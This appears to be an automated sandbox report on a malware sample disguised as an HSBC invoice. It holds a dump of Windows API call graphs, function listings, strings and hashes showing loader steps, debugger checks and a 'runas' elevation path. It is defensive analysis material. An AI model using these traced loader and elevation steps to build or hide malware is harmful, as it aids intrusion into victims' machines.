100118->100119 100120 ea0ff6 Mailbox 59 API calls 100119->100120 100121 e8fa68 100120->100121 100122 e96259 100121->100122 100123 e96267 100122->100123 100124 e877c7 59 API calls 100123->100124 100125 e96272 100124->100125 100126 e877c7 59 API calls 100125->100126 100127 e9627d 100126->100127 100128 e877c7 59 API calls 100127->100128 100129 e96288 100128->100129 100130 e877c7 59 API calls 100129->100130 100131 e96293 100130->100131 100132 e95bfd 59 API calls 100131->100132 100133 e9629e 100132->100133 100134 ea0ff6 Mailbox 59 API calls 100133->100134 100135 e962a5 RegisterClipboardFormatW 100134->100135 100135->100085 100138 e9ffee 100137->100138 100139 ed5cc3 100137->100139 100141 ea0ff6 Mailbox 59 API calls 100138->100141 100156 ee9d71 60 API calls 100139->100156 100143 e9fff6 100141->100143 100142 ed5cce 100143->100089 100144->100096 100145->100098 100157 ee748f 65 API calls 100145->100157 100147 e877c7 59 API calls 100146->100147 100148 ea0227 100147->100148 100149 e877c7 59 API calls 100148->100149 100150 ea022f 100149->100150 100151 e877c7 59 API calls 100150->100151 100152 ea017b 100151->100152 100152->100102 100154 e877c7 59 API calls 100153->100154 100155 e95c05 100154->100155 100155->100116 100156->100142 100158 e81078 100163 e871eb 100158->100163 100160 e8108c 100161 ea2f80 __cinit 67 API calls 100160->100161 100162 e81096 100161->100162 100164 e871fb __write_nolock 100163->100164 100165 e877c7 59 API calls 100164->100165 100166 e872b1 100165->100166 100194 e84864 100166->100194 100168 e872ba 100201 ea074f 100168->100201 100171 e87e0b 59 API calls 100172 e872d3 100171->100172 100207 e83f84 100172->100207 100175 e877c7 59 API calls 100176 e872eb 100175->100176 100177 e87eec 59 API calls 100176->100177 100178 e872f4 RegOpenKeyExW 100177->100178 100179 ebecda RegQueryValueExW 100178->100179 100183 e87316 Mailbox 100178->100183 100180 ebed6c RegCloseKey 100179->100180 100181 ebecf7 100179->100181 100180->100183 100193 ebed7e _wcscat Mailbox __NMSG_WRITE 100180->100193 100182 ea0ff6 Mailbox 59 API calls 100181->100182 100184 ebed10 100182->100184 100183->100160 100185 e8538e 59 API calls 100184->100185 100186 ebed1b RegQueryValueExW 100185->100186 100187 ebed38 100186->100187 100190 ebed52 100186->100190 100188 e87d2c 59 API calls 100187->100188 100188->100190 100189 e87b52 59 API calls 100189->100193 100190->100180 100191 e87f41 59 API calls 100191->100193 100192 e83f84 59 API calls 100192->100193 100193->100183 100193->100189 100193->100191 100193->100192 100213 eb1b90 100194->100213 100197 e87f41 59 API calls 100198 e84897 100197->100198 100215 e848ae 100198->100215 100200 e848a1 Mailbox 100200->100168 100202 eb1b90 __write_nolock 100201->100202 100203 ea075c GetFullPathNameW 100202->100203 100204 ea077e 100203->100204 100205 e87d2c 59 API calls 100204->100205 100206 e872c5 100205->100206 100206->100171 100208 e83f92 100207->100208 100212 e83fb4 _memmove 100207->100212 100210 ea0ff6 Mailbox 59 API calls 100208->100210 100209 ea0ff6 Mailbox 59 API calls 100211 e83fc8 100209->100211 100210->100212 100211->100175 100212->100209 100214 e84871 GetModuleFileNameW 100213->100214 100214->100197 100216 eb1b90 __write_nolock 100215->100216 100217 e848bb GetFullPathNameW 100216->100217 100218 e848da 100217->100218 100219 e848f7 100217->100219 100220 e87d2c 59 API calls 100218->100220 100221 e87eec 59 API calls 100219->100221 100222 e848e6 100220->100222 100221->100222 100225 e87886 100222->100225 100226 e87894 100225->100226 100227 e87e8c 59 API calls 100226->100227 100228 e848f2 100227->100228 100228->100200 100229 e223b0 100243 e20000 100229->100243 100231 e224be 100246 e222a0 100231->100246 100249 e234f0 GetPEB 100243->100249 100245 e2068b 100245->100231 100247 e222a9 Sleep 100246->100247 100248 e222b7 100247->100248 100250 e2351a 100249->100250 100250->100245 100251 ea7e93 100252 ea7e9f _raise 100251->100252 100288 eaa048 GetStartupInfoW 100252->100288 100254 ea7ea4 100290 ea8dbc GetProcessHeap 100254->100290 100256 ea7efc 100257 ea7f07 100256->100257 100373 ea7fe3 58 API calls 3 library calls 100256->100373 100291 ea9d26 100257->100291 100260 ea7f0d 100261 ea7f18 __RTC_Initialize 100260->100261 100374 ea7fe3 58 API calls 3 library calls 100260->100374 100312 ead812 100261->100312 100264 ea7f27 100265 ea7f33 GetCommandLineW 100264->100265 100375 ea7fe3 58 API calls 3 library calls 100264->100375 100331 eb5173 GetEnvironmentStringsW 100265->100331 100268 ea7f32 100268->100265 100271 ea7f4d 100274 ea7f58 100271->100274 100376 ea32f5 58 API calls 3 library calls 100271->100376 100341 eb4fa8 100274->100341 100275 ea7f5e 100276 ea7f69 100275->100276 100377 ea32f5 58 API calls 3 library calls 100275->100377 100355 ea332f 100276->100355 100279 ea7f71 100280 ea7f7c __wwincmdln 100279->100280 100378 ea32f5 58 API calls 3 library calls 100279->100378 100361 e8492e 100280->100361 100283 ea7f90 100284 ea7f9f 100283->100284 100379 ea3598 58 API calls _doexit 100283->100379 100380 ea3320 58 API calls _doexit 100284->100380 100287 ea7fa4 _raise 100289 eaa05e 100288->100289 100289->100254 100290->100256 100381 ea33c7 36 API calls 2 library calls 100291->100381 100293 ea9d2b 100382 ea9f7c InitializeCriticalSectionAndSpinCount __getstream 100293->100382 100295 ea9d30 100296 ea9d34 100295->100296 100384 ea9fca TlsAlloc 100295->100384 100383 ea9d9c 61 API calls 2 library calls 100296->100383 100299 ea9d46 100299->100296 100301 ea9d51 100299->100301 100300 ea9d39 100300->100260 100385 ea8a15 100301->100385 100303 ea9d93 100393 ea9d9c 61 API calls 2 library calls 100303->100393 100307 ea9d72 100307->100303 100309 ea9d78 100307->100309 100308 ea9d98 100308->100260 100392 ea9c73 58 API calls 4 library calls 100309->100392 100311 ea9d80 GetCurrentThreadId 100311->100260 100313 ead81e _raise 100312->100313 100314 ea9e4b __lock 58 API calls 100313->100314 100315 ead825 100314->100315 100316 ea8a15 __calloc_crt 58 API calls 100315->100316 100317 ead836 100316->100317 100318 ead8a1 GetStartupInfoW 100317->100318 100319 ead841 _raise @_EH4_CallFilterFunc@8 100317->100319 100325 ead8b6 100318->100325 100326 ead9e5 100318->100326 100319->100264 100320 eadaad 100407 eadabd RtlLeaveCriticalSection _doexit 100320->100407 100322 ea8a15 __calloc_crt 58 API calls 100322->100325 100323 eada32 GetStdHandle 100323->100326 100324 eada45 GetFileType 100324->100326 100325->100322 100325->100326 100328 ead904 100325->100328 100326->100320 100326->100323 100326->100324 100406 eaa06b InitializeCriticalSectionAndSpinCount 100326->100406 100327 ead938 GetFileType 100327->100328 100328->100326 100328->100327 100405 eaa06b InitializeCriticalSectionAndSpinCount 100328->100405 100332 ea7f43 100331->100332 100333 eb5184 100331->100333 100337 eb4d6b GetModuleFileNameW 100332->100337 100333->100333 100408 ea8a5d 58 API calls 2 library calls 100333->100408 100335 eb51aa _memmove 100336 eb51c0 FreeEnvironmentStringsW 100335->100336 100336->100332 100338 eb4d9f _wparse_cmdline 100337->100338 100340 eb4ddf _wparse_cmdline 100338->100340 100409 ea8a5d 58 API calls 2 library calls 100338->100409 100340->100271 100342 eb4fc1 __NMSG_WRITE 100341->100342 100346 eb4fb9 100341->100346 100343 ea8a15 __calloc_crt 58 API calls 100342->100343 100351 eb4fea __NMSG_WRITE 100343->100351 100344 eb5041 100345 ea2f95 _free 58 API calls 100344->100345 100345->100346 100346->100275 100347 ea8a15 __calloc_crt 58 API calls 100347->100351 100348 eb5066 100349 ea2f95 _free 58 API calls 100348->100349 100349->100346 100351->100344 100351->100346 100351->100347 100351->100348 100352 eb507d 100351->100352 100410 eb4857 58 API calls __wctomb_s_l 100351->100410 100411 ea9006 IsProcessorFeaturePresent 100352->100411 100354 eb5089 100354->100275 100357 ea333b __IsNonwritableInCurrentImage 100355->100357 100426 eaa711 100357->100426 100358 ea3359 __initterm_e 100359 ea2f80 __cinit 67 API calls 100358->100359 100360 ea3378 __cinit __IsNonwritableInCurrentImage 100358->100360 100359->100360 100360->100279 100362 e84948 100361->100362 100372 e849e7 100361->100372 100363 e84982 745CC8D0 100362->100363 100429 ea35ac 100363->100429 100367 e849ae 100441 e84a5b SystemParametersInfoW SystemParametersInfoW 100367->100441 100369 e849ba 100442 e83b4c 100369->100442 100371 e849c2 SystemParametersInfoW 100371->100372 100372->100283 100373->100257 100374->100261 100375->100268 100379->100284 100380->100287 100381->100293 100382->100295 100383->100300 100384->100299 100387 ea8a1c 100385->100387 100388 ea8a57 100387->100388 100390 ea8a3a 100387->100390 100394 eb5446 100387->100394 100388->100303 100391 eaa026 TlsSetValue 100388->100391 100390->100387 100390->100388 100402 eaa372 Sleep 100390->100402 100391->100307 100392->100311 100393->100308 100395 eb5451 100394->100395 100401 eb546c 100394->100401 100396 eb545d 100395->100396 100395->100401 100403 ea8d68 58 API calls __getptd_noexit 100396->100403 100398 eb547c RtlAllocateHeap 100399 eb5462 100398->100399 100398->100401 100399->100387 100401->100398 100401->100399 100404 ea35e1 RtlDecodePointer 100401->100404 100402->100390 100403->100399 100404->100401 100405->100328 100406->100326 100407->100319 100408->100335 100409->100340 100410->100351 100412 ea9011 100411->100412 100417 ea8e99 100412->100417 100416 ea902c 100416->100354 100418 ea8eb3 _memset ___raise_securityfailure 100417->100418 100419 ea8ed3 IsDebuggerPresent 100418->100419 100425 eaa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 100419->100425 100421 eac836 ___crtMessageBoxW 6 API calls 100422 ea8fba 100421->100422 100424 eaa380 GetCurrentProcess TerminateProcess 100422->100424 100423 ea8f97 ___raise_securityfailure 100423->100421 100424->100416 100425->100423 100427 eaa714 RtlEncodePointer 100426->100427 100427->100427 100428 eaa72e 100427->100428 100428->100358 100430 ea9e4b __lock 58 API calls 100429->100430 100431 ea35b7 RtlDecodePointer RtlEncodePointer 100430->100431 100494 ea9fb5 RtlLeaveCriticalSection 100431->100494 100433 e849a7 100434 ea3614 100433->100434 100435 ea3638 100434->100435 100436 ea361e 100434->100436 100435->100367 100436->100435 100495 ea8d68 58 API calls __getptd_noexit 100436->100495 100438 ea3628 100496 ea8ff6 9 API calls __wctomb_s_l 100438->100496 100440 ea3633 100440->100367 100441->100369 100443 e83b59 __write_nolock 100442->100443 100444 e877c7 59 API calls 100443->100444 100445 e83b63 GetCurrentDirectoryW 100444->100445 100497 e83778 100445->100497 100447 e83b8c IsDebuggerPresent 100448 e83b9a 100447->100448 100449 ebd4ad MessageBoxA 100447->100449 100450 e83c73 100448->100450 100452 ebd4c7 100448->100452 100453 e83bb7 100448->100453 100449->100452 100451 e83c7a SetCurrentDirectoryW 100450->100451 100454 e83c87 Mailbox 100451->100454 100707 e87373 59 API calls Mailbox 100452->100707 100578 e873e5 100453->100578 100454->100371 100459 ebd4d7 100462 ebd4ed SetCurrentDirectoryW 100459->100462 100462->100454 100494->100433 100495->100438 100496->100440 100498 e877c7 59 API calls 100497->100498 100499 e8378e 100498->100499 100709 e83d43 100499->100709 100501 e837ac 100502 e84864 61 API calls 100501->100502 100503 e837c0 100502->100503 100504 e87f41 59 API calls 100503->100504 100505 e837cd 100504->100505 100506 e84f3d 135 API calls 100505->100506 100507 e837e6 100506->100507 100508 ebd3ae 100507->100508 100509 e837ee Mailbox 100507->100509 100751 ee97e5 100508->100751 100513 e881a7 59 API calls 100509->100513 100512 ebd3cd 100515 ea2f95 _free 58 API calls 100512->100515 100516 e83801 100513->100516 100514 e84faa 84 API calls 100514->100512 100517 ebd3da 100515->100517 100723 e893ea 100516->100723 100519 e84faa 84 API calls 100517->100519 100521 ebd3e3 100519->100521 100525 e83ee2 59 API calls 100521->100525 100522 e87f41 59 API calls 100523 e8381a 100522->100523 100524 e88620 69 API calls 100523->100524 100526 e8382c Mailbox 100524->100526 100527 ebd3fe 100525->100527 100528 e87f41 59 API calls 100526->100528 100529 e83ee2 59 API calls 100527->100529 100530 e83852 100528->100530 100531 ebd41a 100529->100531 100532 e88620 69 API calls 100530->100532 100533 e84864 61 API calls 100531->100533 100535 e83861 Mailbox 100532->100535 100534 ebd43f 100533->100534 100536 e83ee2 59 API calls 100534->100536 100538 e877c7 59 API calls 100535->100538 100537 ebd44b 100536->100537 100539 e881a7 59 API calls 100537->100539 100540 e8387f 100538->100540 100541 ebd459 100539->100541 100726 e83ee2 100540->100726 100543 e83ee2 59 API calls 100541->100543 100546 ebd468 100543->100546 100551 e881a7 59 API calls 100546->100551 100547 e83899 100547->100521 100548 e838a3 100547->100548 100549 ea313d _W_store_winword 60 API calls 100548->100549 100550 e838ae 100549->100550 100550->100527 100552 e838b8 100550->100552 100553 ebd48a 100551->100553 100554 ea313d _W_store_winword 60 API calls 100552->100554 100555 e83ee2 59 API calls 100553->100555 100556 e838c3 100554->100556 100557 ebd497 100555->100557 100556->100531 100558 e838cd 100556->100558 100557->100557 100559 ea313d _W_store_winword 60 API calls 100558->100559 100560 e838d8 100559->100560 100560->100546 100561 e83919 100560->100561 100563 e83ee2 59 API calls 100560->100563 100561->100546 100562 e83926 100561->100562 100564 e8942e 59 API calls 100562->100564 100565 e838fc 100563->100565 100566 e83936 100564->100566 100567 e881a7 59 API calls 100565->100567 100569 e891b0 59 API calls 100566->100569 100568 e8390a 100567->100568 100570 e83ee2 59 API calls 100568->100570 100571 e83944 100569->100571 100570->100561 100742 e89040 100571->100742 100573 e893ea 59 API calls 100575 e83961 100573->100575 100574 e89040 60 API calls 100574->100575 100575->100573 100575->100574 100576 e83ee2 59 API calls 100575->100576 100577 e839a7 Mailbox 100575->100577 100576->100575 100577->100447 100579 e873f2 __write_nolock 100578->100579 100580 ebee4b _memset 100579->100580 100581 e8740b 100579->100581 100583 ebee67 75B5D0D0 100580->100583 100582 e848ae 60 API calls 100581->100582 100584 e87414 100582->100584 100586 ebeeb6 100583->100586 100791 ea09d5 100584->100791 100588 e87d2c 59 API calls 100586->100588 100590 ebeecb 100588->100590 100590->100590 100707->100459 100710 e83d50 __write_nolock 100709->100710 100711 e87d2c 59 API calls 100710->100711 100717 e83eb6 Mailbox 100710->100717 100712 e83d82 100711->100712 100713 e87b52 59 API calls 100712->100713 100720 e83db8 Mailbox 100712->100720 100713->100712 100714 e87b52 59 API calls 100714->100720 100715 e83e89 100716 e87f41 59 API calls 100715->100716 100715->100717 100719 e83eaa 100716->100719 100717->100501 100718 e87f41 59 API calls 100718->100720 100721 e83f84 59 API calls 100719->100721 100720->100714 100720->100715 100720->100717 100720->100718 100722 e83f84 59 API calls 100720->100722 100721->100717 100722->100720 100724 ea0ff6 Mailbox 59 API calls 100723->100724 100725 e8380d 100724->100725 100725->100522 100727 e83eec 100726->100727 100728 e83f05 100726->100728 100730 e881a7 59 API calls 100727->100730 100729 e87d2c 59 API calls 100728->100729 100731 e8388b 100729->100731 100730->100731 100732 ea313d 100731->100732 100733 ea3149 100732->100733 100734 ea31be 100732->100734 100741 ea316e 100733->100741 100786 ea8d68 58 API calls __getptd_noexit 100733->100786 100788 ea31d0 60 API calls 3 library calls 100734->100788 100737 ea31cb 100737->100547 100738 ea3155 100787 ea8ff6 9 API calls __wctomb_s_l 100738->100787 100740 ea3160 100740->100547 100741->100547 100743 ebf5a5 100742->100743 100745 e89057 100742->100745 100743->100745 100790 e88d3b 59 API calls Mailbox 100743->100790 100746 e8915f 100745->100746 100747 e89158 100745->100747 100748 e891a0 100745->100748 100746->100575 100750 ea0ff6 Mailbox 59 API calls 100747->100750 100789 e89e9c 60 API calls Mailbox 100748->100789 100750->100746 100752 e85045 85 API calls 100751->100752 100753 ee9854 100752->100753 100754 ee99be 96 API calls 100753->100754 100755 ee9866 100754->100755 100756 e8506b 74 API calls 100755->100756 100783 ebd3c1 100755->100783 100757 ee9881 100756->100757 100758 e8506b 74 API calls 100757->100758 100759 ee9891 100758->100759 100760 e8506b 74 API calls 100759->100760 100761 ee98ac 100760->100761 100762 e8506b 74 API calls 100761->100762 100763 ee98c7 100762->100763 100764 e85045 85 API calls 100763->100764 100765 ee98de 100764->100765 100766 ea594c std::exception::_Copy_str 58 API calls 100765->100766 100767 ee98e5 100766->100767 100768 ea594c std::exception::_Copy_str 58 API calls 100767->100768 100769 ee98ef 100768->100769 100770 e8506b 74 API calls 100769->100770 100771 ee9903 100770->100771 100772 ee9393 GetSystemTimeAsFileTime 100771->100772 100773 ee9916 100772->100773 100774 ee992b 100773->100774 100775 ee9940 100773->100775 100778 ea2f95 _free 58 API calls 100774->100778 100776 ee9946 100775->100776 100777 ee99a5 100775->100777 100779 ee8d90 116 API calls 100776->100779 100780 ea2f95 _free 58 API calls 100777->100780 100781 ee9931 100778->100781 100782 ee999d 100779->100782 100780->100783 100784 ea2f95 _free 58 API calls 100781->100784 100785 ea2f95 _free 58 API calls 100782->100785 100783->100512 100783->100514 100784->100783 100785->100783 100786->100738 100787->100740 100788->100737 100789->100746 100790->100745 100792 eb1b90 __write_nolock 100791->100792 100793 ea09e2 GetLongPathNameW 100792->100793 100794 e87d2c 59 API calls 100793->100794 100795 e8741d 100794->100795 100796 e8716b 100795->100796 101095 e2295b 101096 e22970 101095->101096 101097 e20000 GetPEB 101096->101097 101098 e2297c 101097->101098 101099 e22a30 101098->101099 101100 e2299a 101098->101100 101117 e232e0 9 API calls 101099->101117 101104 e22640 101100->101104 101103 e22a17 101105 e20000 GetPEB 101104->101105 101108 e226df 101105->101108 101107 e22710 CreateFileW 101107->101108 101111 e2271d 101107->101111 101109 e22739 VirtualAlloc 101108->101109 101108->101111 101115 e22840 FindCloseChangeNotification 101108->101115 101116 e22850 VirtualFree 101108->101116 101118 e23550 GetPEB 101108->101118 101110 e2275a ReadFile 101109->101110 101109->101111 101110->101111 101114 e22778 VirtualAlloc 101110->101114 101112 e2293a 101111->101112 101113 e2292c VirtualFree 101111->101113 101112->101103 101113->101112 101114->101108 101114->101111 101115->101108 101116->101108 101117->101103 101119 e2357a 101118->101119 101119->101107 101120 fb20a0 101121 fb20b0 101120->101121 101122 fb21ca LoadLibraryA 101121->101122 101125 fb220f VirtualProtect VirtualProtect 101121->101125 101123 fb21e1 101122->101123 101123->101121 101127 fb21f3 GetProcAddress 101123->101127 101126 fb2274 101125->101126 101126->101126 101127->101123 101128 fb2209 ExitProcess 101127->101128 101129 e83633 101130 e8366a 101129->101130 101131 e83688 101130->101131 101132 e836e7 101130->101132 101168 e836e5 101130->101168 101133 e8375d PostQuitMessage 101131->101133 101134 e83695 101131->101134 101136 e836ed 101132->101136 101137 ebd31c 101132->101137 101170 e836d8 101133->101170 101138 ebd38f 101134->101138 101139 e836a0 101134->101139 101135 e836ca NtdllDefWindowProc_W 101135->101170 101141 e836f2 101136->101141 101142 e83715 SetTimer RegisterClipboardFormatW 101136->101142 101179 e911d0 10 API calls Mailbox 101137->101179 101183 ee2a16 71 API calls _memset 101138->101183 101143 e836a8 101139->101143 101144 e83767 101139->101144 101148 e836f9 KillTimer 101141->101148 101149 ebd2bf 101141->101149 101145 e8373e CreatePopupMenu 101142->101145 101142->101170 101150 e836b3 101143->101150 101151 ebd374 101143->101151 101177 e84531 64 API calls _memset 101144->101177 101145->101170 101147 ebd343 101180 e911f3 340 API calls Mailbox 101147->101180 101174 e844cb Shell_NotifyIconW _memset 101148->101174 101155 ebd2f8 MoveWindow 101149->101155 101156 ebd2c4 101149->101156 101158 e8374b 101150->101158 101159 e836be 101150->101159 101151->101135 101182 ed817e 59 API calls Mailbox 101151->101182 101152 ebd3a1 101152->101135 101152->101170 101155->101170 101161 ebd2c8 101156->101161 101162 ebd2e7 SetFocus 101156->101162 101176 e845df 81 API calls _memset 101158->101176 101159->101135 101181 e844cb Shell_NotifyIconW _memset 101159->101181 101160 e8375b 101160->101170 101161->101159 101167 ebd2d1 101161->101167 101162->101170 101163 e8370c 101175 e83114 DeleteObject DestroyWindow Mailbox 101163->101175 101178 e911d0 10 API calls Mailbox 101167->101178 101168->101135 101172 ebd368 101173 e843db 68 API calls 101172->101173 101173->101168 101174->101163 101175->101170 101176->101160 101177->101160 101178->101170 101179->101147 101180->101159 101181->101172 101182->101168 101183->101152 101184 e81055 101189 e82649 101184->101189 101187 ea2f80 __cinit 67 API calls 101188 e81064 101187->101188 101190 e877c7 59 API calls 101189->101190 101191 e826b7 101190->101191 101196 e83582 101191->101196 101194 e82754 101195 e8105a 101194->101195 101199 e83416 59 API calls 2 library calls 101194->101199 101195->101187 101200 e835b0 101196->101200 101199->101194 101201 e835bd 101200->101201 101202 e835a1 101200->101202 101201->101202 101203 e835c4 RegOpenKeyExW 101201->101203 101202->101194 101203->101202 101204 e835de RegQueryValueExW 101203->101204 101205 e835ff 101204->101205 101206 e83614 RegCloseKey 101204->101206 101205->101206 101206->101202 101207 e81016 101212 e84ad2 101207->101212 101210 ea2f80 __cinit 67 API calls 101211 e81025 101210->101211 101213 ea0ff6 Mailbox 59 API calls 101212->101213 101214 e84ada 101213->101214 101215 e8101b 101214->101215 101219 e84a94 101214->101219 101215->101210 101220 e84a9d 101219->101220 101221 e84aaf 101219->101221 101222 ea2f80 __cinit 67 API calls 101220->101222 101223 e84afe 101221->101223 101222->101221 101224 e877c7 59 API calls 101223->101224 101225 e84b16 GetVersionExW 101224->101225 101226 e87d2c 59 API calls 101225->101226 101227 e84b59 101226->101227 101228 e87e8c 59 API calls 101227->101228 101236 e84b86 101227->101236 101229 e84b7a 101228->101229 101230 e87886 59 API calls 101229->101230 101230->101236 101231 e84bf1 GetCurrentProcess IsWow64Process 101232 e84c0a 101231->101232 101234 e84c89 GetSystemInfo 101232->101234 101235 e84c20 101232->101235 101233 ebdc8d 101237 e84c56 101234->101237 101247 e84c95 101235->101247 101236->101231 101236->101233 101237->101215 101240 e84c7d GetSystemInfo 101243 e84c47 101240->101243 101241 e84c32 101242 e84c95 2 API calls 101241->101242 101244 e84c3a GetNativeSystemInfo 101242->101244 101243->101237 101245 e84c4d FreeLibrary 101243->101245 101244->101243 101245->101237 101248 e84c2e 101247->101248 101249 e84c9e LoadLibraryA 101247->101249 101248->101240 101248->101241 101249->101248 101250 e84caf GetProcAddress 101249->101250 101250->101248

                    Executed Functions

                    Function 00E83B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E83B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00E83B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F462F8,00F462E0,?,?), ref: 00E83BFD
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                      • Part of subcall function 00E90A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E83C26,00F462F8,?,?,?), ref: 00E90ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E83C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F393F0,00000010), ref: 00EBD4BC
                    • SetCurrentDirectoryW.KERNEL32(?,00F462F8,?,?,?), ref: 00EBD4F4
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F35D40,00F462F8,?,?,?), ref: 00EBD57A
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00EBD581
                      • Part of subcall function 00E83A58: GetSysColorBrush.USER32(0000000F), ref: 00E83A62
                      • Part of subcall function 00E83A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E83A71
                      • Part of subcall function 00E83A58: LoadIconW.USER32(00000063), ref: 00E83A88
                      • Part of subcall function 00E83A58: LoadIconW.USER32(000000A4), ref: 00E83A9A
                      • Part of subcall function 00E83A58: LoadIconW.USER32(000000A2), ref: 00E83AAC
                      • Part of subcall function 00E83A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E83AD2
                      • Part of subcall function 00E83A58: RegisterClassExW.USER32(?), ref: 00E83B28
                      • Part of subcall function 00E839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83A15
                      • Part of subcall function 00E839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83A36
                      • Part of subcall function 00E839E7: ShowWindow.USER32(00000000,?,?), ref: 00E83A4A
                      • Part of subcall function 00E839E7: ShowWindow.USER32(00000000,?,?), ref: 00E83A53
                      • Part of subcall function 00E843DB: _memset.LIBCMT ref: 00E84401
                      • Part of subcall function 00E843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E844A6
                    Strings
                    • This is a third-party compiled AutoIt script., xrefs: 00EBD4B4
                    • runas, xrefs: 00EBD575
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas
                    • API String ID: 529118366-3287110873
                    • Opcode ID: 800c2d19f2fd2b8b4484ec05936e7767c8c984c64f75d65921bd5fc024d31f61
                    • Instruction ID: 3775c2483fe015773c632b681b03d612dd4f800abf390d95848d4825fbab2a57
                    • Opcode Fuzzy Hash: 800c2d19f2fd2b8b4484ec05936e7767c8c984c64f75d65921bd5fc024d31f61
                    • Instruction Fuzzy Hash: 3751E87490824DBBCF11FBB4DC05DED7BB4AB16704B105169F85DB21A2DAB08705EB22
                    Function 00E83633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 765 e83633-e83681 767 e836e1-e836e3 765->767 768 e83683-e83686 765->768 767->768 771 e836e5 767->771 769 e83688-e8368f 768->769 770 e836e7 768->770 772 e8375d-e83765 PostQuitMessage 769->772 773 e83695-e8369a 769->773 775 e836ed-e836f0 770->775 776 ebd31c-ebd34a call e911d0 call e911f3 770->776 774 e836ca-e836d2 NtdllDefWindowProc_W 771->774 781 e83711-e83713 772->781 777 ebd38f-ebd3a3 call ee2a16 773->777 778 e836a0-e836a2 773->778 780 e836d8-e836de 774->780 782 e836f2-e836f3 775->782 783 e83715-e8373c SetTimer RegisterClipboardFormatW 775->783 811 ebd34f-ebd356 776->811 777->781 802 ebd3a9 777->802 784 e836a8-e836ad 778->784 785 e83767-e83776 call e84531 778->785 781->780 789 e836f9-e8370c KillTimer call e844cb call e83114 782->789 790 ebd2bf-ebd2c2 782->790 783->781 786 e8373e-e83749 CreatePopupMenu 783->786 791 e836b3-e836b8 784->791 792 ebd374-ebd37b 784->792 785->781 786->781 789->781 796 ebd2f8-ebd317 MoveWindow 790->796 797 ebd2c4-ebd2c6 790->797 800 e8374b-e8375b call e845df 791->800 801 e836be-e836c4 791->801 792->774 799 ebd381-ebd38a call ed817e 792->799 796->781 805 ebd2c8-ebd2cb 797->805 806 ebd2e7-ebd2f3 SetFocus 797->806 799->774 800->781 801->774 801->811 802->774 805->801 812 ebd2d1-ebd2e2 call e911d0 805->812 806->781 811->774 815 ebd35c-ebd36f call e844cb call e843db 811->815 812->781 815->774
                    APIs
                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00E836D2
                    • KillTimer.USER32(?,00000001), ref: 00E836FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E8371F
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E8372A
                    • CreatePopupMenu.USER32 ref: 00E8373E
                    • PostQuitMessage.USER32(00000000), ref: 00E8375F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                    • String ID: TaskbarCreated
                    • API String ID: 157504867-2362178303
